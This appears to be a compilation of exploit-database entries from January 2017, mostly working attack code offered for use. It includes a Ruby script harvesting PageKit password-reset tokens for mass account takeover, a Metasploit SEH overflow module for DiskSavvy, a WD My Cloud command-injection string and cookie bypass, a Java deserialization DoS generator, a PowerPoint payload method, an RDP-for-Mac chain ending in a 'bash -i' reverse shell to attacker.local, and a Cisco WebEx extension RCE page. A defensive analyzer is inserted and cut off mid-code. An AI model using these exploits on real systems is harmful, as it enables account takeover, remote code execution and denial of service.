# Exploit Title: Remote PageKit Password Reset Vulnerability
# Date:21-01-2017
# Software Link: http://pagekit.com/
# Exploit Author: Saurabh Banawar from SecureLayer7

# Contact: http://twitter.com/securelayer7
# Website: https://securelayer7.net
# Category: webapps

1. Description

Any remote user can reset the passwords of other users by reading the debug log; the exploit can be executed successfully if the debug option is enabled in the Pagekit CMS.

The CMS pentest report can be found here: https://securelayer7.net/download/pdf/SecureLayer7-Pentest-report-Pagekit-CMS.pdf


2. Proof of Concept

require 'net/http'

# Enter the domain/IP address of the site for which you want to test this vulnerability
vulnerableSite = 'http://127.0.0.1'

# This loop runs forever because we want to continuously monitor who is requesting a
# password reset and who has clicked on the link, so that we can perform mass account takeovers
loop do

  # We request the login page, whose HTML source carries the _debug parameter
  url = URI.parse(vulnerableSite + '/pagekit/index.php/user/login')
  request = Net::HTTP::Get.new(url.to_s)
  resp = Net::HTTP.start(url.host, url.port) { |http| http.request(request) }

  # The response body is split on regular expressions to extract the value of the _debug parameter
  bodyOfResponse = resp.body
  myArray1 = bodyOfResponse.split(/"current":"/)
  outputOfMyArray1 = myArray1[1]
  myArray2 = outputOfMyArray1.split(/"};/)
  theSecret = myArray2[0]
  puts ""
  puts "The secret token to debug link is: #{theSecret}"
  puts ""

  # The debug bar endpoint exposes the mails the application sent, including reset links
  url = URI.parse(vulnerableSite + '/pagekit/index.php/_debugbar/' + theSecret)
  request = Net::HTTP::Get.new(url.to_s)
  resp = Net::HTTP.start(url.host, url.port) { |http| http.request(request) }
  initial = resp.body

  # The number of victim users is found out
  users = initial.scan(/user=.+?(?=")/)
  c = users.count
  e = c.to_i

  # If the count is 0 then we keep monitoring
  if c == 0
    puts "Currently no user has clicked on the reset password link."
    puts ""
    puts "Trying again..."
    puts ""
    puts ""
  # If the count is greater than 0 then we found a victim: build the password reset link and print it
  else
    link1 = vulnerableSite + "/pagekit/index.php/user/resetpassword/confirm?user="
    link2 = "&key="
    i = 0
    while i < e
      securityToken = ''
      a = users[i]                      # e.g. user=victim\u0026key=abcd... (JSON-escaped in the debug output)
      b = a.split('=')
      c = b[1]
      d = c.split('\\')
      victimUserName = d[0]
      puts "The victim is: #{victimUserName}"
      f = b[2]
      securityToken = f.scan(/[^\\]/)   # drop the JSON escape backslashes
      securityTokenFiltered = securityToken.join
      puts "The security token of victim is: #{securityTokenFiltered}"
      puts "Link for account takeover"
      puts "#{link1}#{victimUserName}#{link2}#{securityTokenFiltered}"
      puts ""
      puts ""
      i += 1
    end
  end

  sleep 5   # poll instead of hammering the server
end
 
 

3. Solution:

Update to version 1.0.11
https://github.com/pagekit/pagekit/releases/tag/1.0.11
            
# Exploit Title: Microsoft Power Point Java Payload Code Execution
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Demo Video : https://www.youtube.com/watch?v=DOJSUJK7hRo
# Video Tutorial : https://www.youtube.com/watch?v=Li_h-iuXgEM
# Youtube Channel: https://www.youtube.com/user/cutehack3r
# Date: Jan 21, 2017
# Vendor Homepage: https://www.microsoft.com/
# Software Link: https://www.office.com/
# Version: Windows 7 x64 Ultimate Build 7601 Service Pack 1 Without any updates
# Tested on: Windows 7 x64 Ultimate Build 7601 SP1 Without any updates, Power Point 2016 MSO 16.0.4266.1001 64-bit professional plus and Java Version 8 Update 101 (build 1.8.0_101-b13).

Microsoft PowerPoint allows users to insert objects of arbitrary file types; at presentation time these objects can be activated by mouse movement or clicking.

If the user has Java (or Python or a similar interpreter) installed, an attacker can insert a .jar or .py file into the presentation and trigger it when the mouse moves. For easier exploitation the attacker can use a .ppsx file, which opens directly in presentation mode: once the user opens the file and moves the mouse, the payload is triggered.

To exploit this issue:

1 - Create a new PowerPoint presentation.
2 - Insert an object, choose "Create from file" and select the jar payload.
3 - On the Insert tab, click Action and in both the "Mouse Over" and "Mouse Click" tabs choose "Object action" and then "Activate".
4 - Scale the object to fill the whole slide so that when the user opens the file the mouse is already over it; should the user click instead, the jar file is opened as well.
5 - Save the file as a .ppsx file.

PoC file that opens a Java pop-up when executed; any Java payload will also work, including the Meterpreter payloads generated by Metasploit.

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41144.ppsx

Please note that on a fully patched system a pop-up will ask the user whether to run the file, which is still useful if you're good at social engineering ;)

Timeline:
Aug 10, 2016 - Reported To Microsoft
Sep 7, 2016 - Microsoft said they were unable to reproduce the same behaviour and asked me to update my system and check again.
Sep 8, 2016 - Sent Microsoft confirmation that a pop-up shows in the case of a fully updated Windows 7 version.
Sep 17, 2016 - Microsoft asked for a video showing the bug in both updated and non-updated versions; I sent the video the same day.
Sep 27, 2016 - Microsoft confirmed that the behaviour can only be reproduced on a non-patched version and considered it not reproducible.
            
'''
Application: Java SE

Vendor: Oracle

Bug: DoS

Reported: 23.12.2016

Vendor response: 24.12.2016

Date of Public Advisory: 17.01.2017

Reference: Oracle CPU Jan 2017

Author: Roman Shalymov



1. ADVISORY INFORMATION

Title: Oracle OpenJDK - Java Serialization DoS

Advisory ID: [ERPSCAN-17-006]

Risk: High

Advisory URL:
https://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/

Date published: 17.01.2017

Vendor contacted: Oracle


2. VULNERABILITY INFORMATION


Class: Denial of Service

Remotely Exploitable: Yes

Locally Exploitable: Yes

CVE Name: CVE-2017-3241

CVSS Base Score: 9.0


3. VULNERABILITY DESCRIPTION


An attacker can cause DoS of the application which uses OpenJDK Runtime
Environment 1.8 as its core runtime engine.


4. VULNERABLE PACKAGES


OpenJDK Runtime Environment build 1.8.0_112-b15


5. SOLUTIONS AND WORKAROUNDS


Fix the ObjectInputStream.skipCustomData() method, namely the readObject0(false) call in its switch statement.

Apply the Oracle CPU January 2017 patches.

 6. AUTHOR


Roman Shalymov (@shalymov)


7. TECHNICAL DESCRIPTION


An attacker can craft a malicious sequence of bytes that will cause JVM
StackOverflowError in the standard Java deserialization process if it uses
ObjectInputStream.readObject() method.


7.1. Proof of Concept

An attacker creates a malicious sequence of bytes, for example, using this Python script pwn_ser.py:

'''
#!/usr/bin/env python3

import sys

exp = b""

# serialization header: STREAM_MAGIC 0xaced, STREAM_VERSION 5
exp += b'\xac\xed\x00\x05'

exp1 = b''
exp1 += b'\x72'                          # TC_CLASSDESC
exp1 += b'\x00\x0c' + b'java.io.File'    # className, length-prefixed UTF
exp1 += b'\x41' * 8                      # serialVersionUID
exp1 += b'\x00'                          # classDescFlags
exp1 += b'\x00\x00'                      # field count: 0

# No TC_ENDBLOCKDATA ever follows, so the next TC_CLASSDESC is read as the
# class annotation of the previous one: one recursion level per copy.
exp += exp1 * 10000

sys.stdout.buffer.write(exp)

'''
and saves the output to the file exp2.ser:

$ ./pwn_ser.py > exp2.ser

Let's simulate deserialization process. For this purpose, we create a
simple Java program, which uses the following standard deserialization
pattern:


Serialize_read.java


import java.io.FileInputStream;
import java.io.ObjectInputStream;

public class Serialize_read {

    public static void main(String args[]) throws Exception {
        if (args.length < 1) {
            System.out.println("usage: " + Serialize_read.class.getSimpleName() + " [file]");
            System.exit(-1);
        }
        FileInputStream fin = new FileInputStream(args[0]);
        ObjectInputStream oin = new ObjectInputStream(fin);
        try {
            Object objFromDisk = oin.readObject();
            String s = (String) objFromDisk;
            System.out.println(s);
            System.out.println("Successfully read!");
        } catch (Exception e) {
            // StackOverflowError is an Error, not an Exception, so it is not caught here
        }
        System.exit(0);
    }
}


Let's try to read our malicious file (we can also simulate this stuff over
network communication):

$ javac Serialize_read.java

$ java Serialize_read exp2.ser

It causes the following error dump:

Exception in thread "main" java.lang.StackOverflowError
    at java.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2351)
    at java.io.ObjectInputStream$BlockDataInputStream.readUnsignedShort(ObjectInputStream.java:2834)
    at java.io.ObjectInputStream$BlockDataInputStream.readUTF(ObjectInputStream.java:2892)
    at java.io.ObjectInputStream.readUTF(ObjectInputStream.java:1075)
    at java.io.ObjectStreamClass.readNonProxy(ObjectStreamClass.java:684)
    at java.io.ObjectInputStream.readClassDescriptor(ObjectInputStream.java:833)
    at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1609)
    at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)
    at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)
    at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)
    at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)
    at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)
    at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)
    ...
    at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)
    at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)
    at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)
    at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)
    at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)
    at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)
    at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)
    at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)
    at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)
    at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)
    at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)

8. REPORT TIMELINE

Reported: 23.12.2016

Vendor response: 24.12.2016

Date of Public Advisory: 17.01.2017

9. REFERENCES
http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
https://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/


10. ABOUT ERPScan Research

ERPScan research team specializes in vulnerability research and analysis of
critical enterprise applications. It was acknowledged multiple times by the
largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for
discovering more than 400 vulnerabilities in their solutions (200 of them
just in SAP!).

ERPScan researchers are proud of discovering new types of vulnerabilities
(TOP 10 Web Hacking Techniques 2012) and of the "The Best Server-Side Bug"
nomination at BlackHat 2013.

ERPScan experts participated as speakers, presenters, and trainers at 60+
prime international security conferences in 25+ countries across the
continents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for
several Fortune 2000 companies.

ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP security
researches.

ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters, Yahoo, SC
Magazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc.

Our team consists of highly-qualified researchers, specialized in various
fields of cybersecurity (from web application to ICS/SCADA systems),
gathering their experience to conduct the best SAP security research.

11. ABOUT ERPScan

ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally and
enables large Oil and Gas, Financial, Retail and other organizations to
secure their mission-critical processes. Named as an "Emerging Vendor" in
Security by CRN, listed among "TOP 100 SAP Solution providers" and
distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in
discovering and resolving security vulnerabilities. ERPScan consultants
work with SAP SE in Walldorf to assist in improving the security of their
latest solutions.

ERPScan's primary mission is to close the gap between technical and
business security, and provide solutions for CISOs to evaluate and secure
SAP and Oracle ERP systems and business-critical applications from both
cyberattacks and internal fraud. As a rule, our clients are large
enterprises, Fortune 2000 companies and MSPs, whose requirements are to
actively monitor and manage security of vast SAP and Oracle landscapes on a
global scale.

We "follow the sun" and have two hubs, located in Palo Alto and Amsterdam,
to provide threat intelligence services, continuous support and to operate
local offices and partner network spanning 20+ countries around the globe.


Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

Phone: 650.798.5255

Twitter: @erpscan

Scoop-it: Business Application Security
'''
            
# Exploit Title: WD My Cloud Mirror 2.11.153 RCE and Authentication Bypass
# Date: 24.01.2017
# Software Link: https://www.wdc.com
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: local
 
1. Description

It's possible to execute arbitrary commands via the login form because the `exec()` function is called without `escapeshellarg()`.

It's possible to bypass the login form because the function only checks that `$_COOKIE['username']` and `$_COOKIE['isAdmin']` exist.

https://security.szurek.pl/wd-my-cloud-mirror-211153-rce-and-authentication-bypass.html

2. Proof of Concept

For RCE simply use as username:

a" || your_command_to_execute || "

For authentication bypass set COOKIES:

username=1; isAdmin=1

and then visit for example php/users.php
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DiskSavvy Enterprise GET Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability
        in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,
        caused by improper bounds checking of the request path in HTTP GET
        requests sent to the built-in web server. This module has been
        tested successfully on Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'vportal',      # Vulnerability discovery and PoC
          'Gabor Seljan'  # Metasploit module
        ],
      'References'     =>
        [
          ['EDB', '40869']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'   => "\x00\x09\x0a\x0d\x20",
          'Space'      => 500
        },
      'Targets'        =>
        [
          [
            'Automatic Targeting',
            {
              'auto' => true
            }
          ],
          [
            'DiskSavvy Enterprise v9.1.14',
            {
              'Offset' => 542,
              'Ret'    => 0x101142c0  # POP # POP # RET [libspp.dll]
            }
          ],
          [
            'DiskSavvy Enterprise v9.3.14',
            {
              'Offset' => 2478,
              'Ret'    => 0x101142ff  # POP # POP # RET [libspp.dll]
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Dec 01 2016',
      'DefaultTarget'  => 0))
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/'
    )

    if res && res.code == 200
      version = res.body[/Disk Savvy Enterprise v[^<]*/]
      if version
        vprint_status("Version detected: #{version}")
        if version =~ /9\.(1|3)\.14/
          return Exploit::CheckCode::Appears
        end
        return Exploit::CheckCode::Detected
      end
    else
      vprint_error('Unable to determine due to a HTTP connection timeout')
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    mytarget = target

    if target['auto']
      mytarget = nil

      print_status('Automatically detecting the target...')

      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => '/'
      )

      if res && res.code == 200
        if res.body =~ /Disk Savvy Enterprise v9\.1\.14/
          mytarget = targets[1]
        elsif res.body =~ /Disk Savvy Enterprise v9\.3\.14/
          mytarget = targets[2]
        end
      end

      if !mytarget
        fail_with(Failure::NoTarget, 'No matching target')
      end

      print_status("Selected target: #{mytarget.name}")
    end

    eggoptions = {
      checksum: true,
      eggtag: rand_text_alpha(4, payload_badchars)
    }

    hunter, egg = generate_egghunter(
      payload.encoded,
      payload_badchars,
      eggoptions
    )

    sploit =  make_nops(10)
    sploit << egg
    sploit << rand_text_alpha(mytarget['Offset'] - egg.length)
    sploit << generate_seh_record(mytarget.ret)
    sploit << make_nops(8)
    sploit << hunter
    sploit << rand_text_alpha(4500)

    print_status('Sending malicious request...')

    send_request_cgi(
      'method' => 'GET',
      'uri'    => sploit
    )
  end
end
            
## Description
A vulnerability exists in Microsoft Remote Desktop for Mac that allows a remote attacker to execute arbitrary code on the target machine.
User interaction is needed to exploit this issue, but a single click on a link (sent via mail, iMessage, etc.) is sufficient to trigger the vulnerability.

## Details
Microsoft Remote Desktop Client for Mac OS X (ver 8.0.32 and probably prior) allows a malicious Terminal Server to read and write any file in the home directory of the connecting user.
The vulnerability lies in the way the application handles rdp URLs. In the rdp URL scheme it's possible to specify a parameter that makes the user's home directory accessible to the server without any warning or confirmation request. If an attacker can trick a user into opening a malicious rdp URL, he/she can read and write any file within the victim's home directory.

Since Mac OS X by default opens rdp URLs without confirmation (for example via Safari, Mail, Messages), a single click on a link is sufficient to trigger the vulnerability.

According to Microsoft, no CVE will be assigned due to the release model of this particular client.

A demo video is available at https://youtu.be/6HeSiXYRpNY.

## Proof Of Concept
The following Proof Of Concept creates a directory in the victim's home directory and puts a file into it.
To reproduce the issue, follow the steps below:

- install a windows 2008 server and allow Administrator to connect without password
- login as Administrator
- configure a trusted ssl certificate for rdp connections
- install python2.7 and put the following script in the "Startup" folder
- logout
- send the link below to a victim
RDC link:

```
rdp://full%20address=s:attacker.local&desktopwidth=i:200&desktopheight=i:200&audiomode=i:2&disable%20themes=i:1&screen%20mode%20id=i:1&devicestoredirect:s:*&drivestoredirect=s:*&redirectprinters=i:1&username=s:Administrator
```
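As an added defensive example (not from the advisory or from Microsoft), the Python below parses an rdp:// link into its name=type:value properties and reports which redirection properties (the `drivestoredirect=s:*` above among them) would expose local resources to the named server. The sample link is the one from the advisory, and its `devicestoredirect:s:*` spelling (the .rdp-file form) is accepted alongside the `name=type:value` form.

```python
from urllib.parse import unquote

# Properties named in the advisory that hand the server access to local
# resources; drivestoredirect=s:* is the one that exposes the home directory.
REDIRECTION_KEYS = ("drivestoredirect", "devicestoredirect", "redirectprinters")


def parse_rdp_url(url):
    """Split an rdp:// URL into {name: (type, value)}.

    The link form is name=type:value with %20 escapes in the names; the
    .rdp-file form name:type:value (as in the advisory's devicestoredirect)
    is accepted too.
    """
    if not url.lower().startswith("rdp://"):
        raise ValueError("not an rdp:// URL")
    props = {}
    for raw in url[len("rdp://"):].split("&"):
        if not raw:
            continue
        name, sep, rest = raw.partition("=")
        if not sep:
            name, _, rest = raw.partition(":")
        typ, _, value = rest.partition(":")
        props[unquote(name).lower()] = (typ, unquote(value))
    return props


def redirection_findings(url):
    """Return (server, flagged): the 'full address' the link points at and
    every enabled redirection property with its value, so a link can be
    refused or warned about before the client opens it."""
    props = parse_rdp_url(url)
    server = props.get("full address", ("s", ""))[1]
    flagged = {}
    for key in REDIRECTION_KEYS:
        if key not in props:
            continue
        typ, value = props[key]
        # s:<list or *> names the drives/devices to share; i:1 enables printers
        if (typ == "s" and value.strip()) or (typ == "i" and value == "1"):
            flagged[key] = value
    return server, flagged


# Constructed sample: the link from the advisory above.
ADVISORY_LINK = ("rdp://full%20address=s:attacker.local&desktopwidth=i:200"
                 "&desktopheight=i:200&audiomode=i:2&disable%20themes=i:1"
                 "&screen%20mode%20id=i:1&devicestoredirect:s:*"
                 "&drivestoredirect=s:*&redirectprinters=i:1"
                 "&username=s:Administrator")

if __name__ == "__main__":
    server, flagged = redirection_findings(ADVISORY_LINK)
    print("server:", server)
    for key, value in sorted(flagged.items()):
        print("redirection enabled: %s=%s" % (key, value))
```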


### Python script

```
#BOF
import sys
import subprocess
import time
import os

def runcmd(cmd):
        err = None
        out = None
        try:
                process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
                out, err = process.communicate()
        except Exception as e:
                print str(e)

        return out


# Poll until the client's redirected drives (\\tsclient) show up in "net use",
# then map the redirected home directory and drop a file into it.
while(True):
        netuse = runcmd("net use")
        # str.find() returns -1 when the text is absent, so test it explicitly
        if netuse and netuse.find("TSCLIENT") != -1:
                runcmd('MKLINK /D C:\\home \\\\tsclient\\home')

                runcmd('md c:\\home\\REMOTE')

                runcmd('copy c:\\REMOTE.txt c:\\home\\REMOTE\\REMOTE.txt')

                runcmd("shutdown /l /f")
                break

        time.sleep(0.4)
#EOF
```

## Remote Code Execution
To execute arbitrary code on the target machine we can use a trick that involves ssh and the ssh:// URI handler.
Consider the following example, where the RDC exploit pushes the following files onto the remote machine:

- `~/.ssh/known_hosts`
```
p ssh-rsa AAAAB3NzaC1yc2EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
```
- `~/.ssh/config`
```
Host p
HostName p
ProxyCommand /bin/bash ~/.ssh/command.sh
```
- `~/.ssh/command.sh`
```
for a in {1..31}; do trap "" $a; done
nohup bash -i >& /dev/tcp/attacker.local/1234 0 & 
```

At this point any attempt to launch ssh://p will lead to the execution of ~/.ssh/command.sh without any warning. To automatically execute the triggering URL (ssh://p) we can either:

- send the link to the victim via Mail or iMessage
- poison Safari cache adding some javascript that launches the URL
- poison Safari "Application Saved State" so that the URL is launched when the browser starts
- poison "loginitems" to launch the URL at system startup

It's also possible to achieve Remote Code Execution by sending a single link to the victim if he/she uses Safari as the default browser.

## Update
On Jan 17 2017 Apple pushed a security update to Safari that prevents this exploit from working.
This fix is mentioned in the Apple Store:
This update fixes an issue where a website could repeatedly attempt to launch other websites or applications

## Solution
Update Microsoft RDC to the latest version. The version 8.0.37 fixes this issue.
            
<!--
Cisco's WebEx extension (jlhmfgmfgeifomenelglieieghnjghma) has ~20M active users, and is part of Cisco's popular web conferencing software.

The extension works on any URL that contains the magic pattern "cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html", which can be extracted from the extension's manifest. Note that the pattern can occur in an iframe, so there is not necessarily any user-visible indication of what is happening; visiting any website would be enough.

The extension uses nativeMessaging, so this magic string is enough for any website to execute arbitrary code (!!).

The protocol the extension uses is complicated, using CustomEvent() objects to pass JSON messages between the webpage, the extension and the native code.

Stepping through an initialization, a website must first request that the extension open a port for communication, like this:

document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }})); // token can be any string

Then messages can be passed to native code via "message" events. Note that these cannot be MessageEvent() objects, and you cannot use the postMessage API; they have to be CustomEvent() objects.

There are a few different message types, such as "hello", "disconnect", etc. The most interesting is "launch_meeting":

    document.dispatchEvent(new CustomEvent("message", { detail: {
            message: JSON.stringify(msg),
            message_type: "launch_meeting",
            timestamp: (new Date()).toUTCString(),
            token: "token"
        }
    }));

I stepped through a meeting and dumped the initialization messages:

> message.message
"{"DocshowVersion": "1.0",
"FilterSecParameters": "clientparam;clientparam_value",
"GpcProductRoot": "WebEx",
"GpcMovingInSubdir": "Wanta",
"GpcProductVersion": "T30_MC",
"GpcUpgradeManagement": "false",
"GpcCompatibleDesktopClients": "",
"enableQuickLaunch": "1",
"GpcProductDescription": "V2ViRXg=",
"GpcUnpackName": "atgpcdec",
"JMTSignificantFileList": "atgpcext.dll;atmccli.dll;comui.dll;webexmgr.dll;plugin-config.xml;atmgr.exe;ieatgpc.dll;atkbctl.dll;atwbxui15.dll;atcarmcl.dll;attp.dll;atarm.dll;wbxcrypt.dll;mmssl32.dll;libeay32.dll;ssleay32.dll;atmemmgr.dll;wcldll.dll;uilibres.dll;pfwres.dll;wbxtrace.dll;mcres.dll;atresec.dll;atrestc.dll;mfs.dll;mutilpd.dll;wseclient.dll;mticket.dll;wsertp.dll",
"jmtclicklog": "1484862376664",
"GpcExtName": "atgpcext",
"GpcUnpackVersion": "27, 17, 2016, 501",
"GpcExtVersion": "3015, 0, 2016, 1117",
"GpcUrlRoot": "https://join-test.webex.com/client/WBXclient-T30L10NSP15EP1-10007/webex/self",
"GpcComponentName": "YXRtY2NsaS5ETEw=",
"GpcCompressMethod": "7z",
"GpcActiveIniSection": "V2ViRXhfVg==",
"GpcSupportPageUrl": "",
"GpcIniFileName": "Z3BjLnBocD9wbW9kdWxlcz0lN0NNQ19TVEQlN0NDaGF0JTdDUG9sbGluZyU3Q05vdGUlN0NWaWRlb1NoYXJlJTdDV2ViZXhfUkElN0NBUyU3Q1BEJk9TPVZUJnJlcGxhY2VLZXk9VklTVEElN0NTU0YmTE49JmJhc2ljbmFtZT1XZWJFeF9WJk9TX0JpdD0zMg==
...

There are a huge number of properties, many are obviously good candidates for code execution, but these jumped out at me:

"GpcComponentName": "YXRtY2NsaS5ETEw=",
"GpcInitCall": "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",

If we decode those strings, we get:

GpcComponentName: "atmccli.DLL"
GpcInitCall: "szCookie=InitControl(%HWND);NameValue(LoggingURL_Name,LoggingURL);NameValue(MeetingID_Name,MeetingID);NameValue(SessionID_Name,SessionID);NameValue(GpcIniFileName_Name,GpcIniFileName);NameValue(GpcUrlRoot_Name,GpcUrlRoot);NameValue(GpcExtVersion_Name,GpcExtVersion);NameValue(GpcUnpackVersion_Name,GpcUnpackVersion);NameValue(GpcProductRoot_Name,GpcProductRoot);NameValue(localrootsectionver_Name,localrootsectionver);NameValue(RegType_Name,RegType);NameValue(GpcProgressBarTitle_Name,GpcProgressBarTitle);NameValue(GpcMessageTitle_Name,GpcMessageTitle);NameValue(downloadlocalsetting_Name,downloadlocalsetting);NameValue(productname_Name,productname);NameValue(SFSupporting_Name,SFSupporting_Value);NameValue(MeetingRandom_Name,MeetingRandom);NameValue(clientparam_Name,clientparam_Value);FinishCall(szCookie);"

That looks like some sort of weird scripting language. The presence of `HWND` suggests this is interacting with native code, and if I dump the exports of atmccli.DLL:

$ dumpbin /nologo /exports atmccli.dll

Dump of file atmccli.dll

    ordinal hint RVA      name

          2    2 0001CC11 ExitControl
         24    3 0001CC83 FinishCall
          1    4 0001D2F9 InitControl <--
         23    5 0001D556 NameValue
...

These exports look like the functions being called in that scripting language. Is it possible it's calling those exports?

I noticed that they ship a copy of the CRT (Microsoft's C Runtime, containing standard routines like printf, malloc, etc), so I tried calling the standard _wsystem() routine (like system(), but for WCHAR strings), like this:

var msg = {
    GpcProductRoot: "WebEx",
    GpcMovingInSubdir: "Wanta",
    GpcProductVersion: "T30_MC",
    GpcUnpackName: "atgpcdec",
    GpcExtName: "atgpcext",
    GpcUnpackVersion: "27, 17, 2016, 501",
    GpcExtVersion: "3015, 0, 2016, 1117",
    GpcUrlRoot: "http://127.0.0.1/",
    GpcComponentName: btoa("MSVCR100.DLL"),
    GpcSuppressInstallation: btoa("True"),
    GpcFullPage: "True",
    GpcInitCall: btoa("_wsystem(ExploitShellCommand);"),
    ExploitShellCommand: btoa("calc.exe"),
}

Unbelievably, that worked.

Example exploit attached.

I uploaded a demo here for testing (this URL is secret)

https://lock.cmpxchg8b.com/ieXohz9t/

(You can make sure WebEx is installed and working first by going here. You don't need to register, just enter any name and email)

https://www.webex.com/test-meeting.html
-->

<html>
<head>
<title>Cisco WebEx Exploit</title>
<script>
var msg = {
    GpcProductRoot: "WebEx",
    GpcMovingInSubdir: "Wanta",
    GpcProductVersion: "T30_MC",
    GpcUnpackName: "atgpcdec",
    GpcExtName: "atgpcext",
    GpcUnpackVersion: "27, 17, 2016, 501",
    GpcExtVersion: "3015, 0, 2016, 1117",
    GpcUrlRoot: "http://127.0.0.1/",
    GpcComponentName: btoa("MSVCR100.DLL"),
    GpcSuppressInstallation: btoa("True"),
    GpcFullPage: "True",
    GpcInitCall: btoa("_wsystem(ExploitShellCommand);"),
    ExploitShellCommand: btoa("calc.exe"),
}

function runcode()
{
    if (!document.location.pathname.endsWith("cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html")) {
        alert("document /must/ be named cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html");
        return;
    }

    if (!document.location.protocol.endsWith("https:")) {
        alert("document /must/ be served over https");
        return;
    }

    document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }}));
    document.dispatchEvent(new CustomEvent("message", { detail: {
            message: JSON.stringify(msg),
            message_type: "launch_meeting",
            timestamp: (new Date()).toUTCString(),
            token: "token"
        }
    }));
}
</script>
</head>
<body onload="runcode()">
<h1>Running exploit...</h1>
</body>
</html>
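As an added defensive example (not part of the bug report or of Cisco's code), the analyzer below decodes the base64 fields of a captured launch_meeting message, as described in the comment above, and flags any GpcComponentName other than atmccli.DLL or any GpcInitCall function that is not one of the exports the dumpbin listing shows. The two sample messages are constructed from values quoted in the report; the export allowlist is assumed to be complete only for the four names listed there.

```python
import base64
import json
import re

# From the report: the component the extension is meant to load, and the
# exports dumpbin listed for it (assumed to be the complete allowlist here).
EXPECTED_COMPONENT = "atmccli.DLL"
KNOWN_EXPORTS = {"InitControl", "NameValue", "FinishCall", "ExitControl"}

CALL_RE = re.compile(r"([A-Za-z_]\w*)\s*\(")


def b64_text(value):
    """Decode a base64 field the way the extension does; '' if it is not valid base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (ValueError, TypeError):
        return ""


def init_calls(script):
    """Function names invoked by a decoded GpcInitCall script, in order."""
    return CALL_RE.findall(script)


def analyze_launch_meeting(message_json):
    """Decode the base64 fields of a launch_meeting payload and flag anything
    that would load a DLL other than atmccli.DLL or call a function that is
    not one of its exports."""
    msg = json.loads(message_json)
    component = b64_text(msg.get("GpcComponentName", ""))
    calls = init_calls(b64_text(msg.get("GpcInitCall", "")))
    findings = []
    if component != EXPECTED_COMPONENT:
        findings.append("GpcComponentName %r is not %s" % (component, EXPECTED_COMPONENT))
    for name in sorted(set(calls) - KNOWN_EXPORTS):
        findings.append("GpcInitCall invokes %s, not an atmccli.DLL export" % name)
    return {"component": component, "calls": calls, "findings": findings}


def _b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed samples built from values quoted in the report: a normal launch
# (GpcInitCall shortened) and the component/init pair the PoC sends.
BENIGN_MESSAGE = json.dumps({
    "GpcProductRoot": "WebEx",
    "GpcComponentName": _b64("atmccli.DLL"),
    "GpcInitCall": _b64("szCookie=InitControl(%HWND);"
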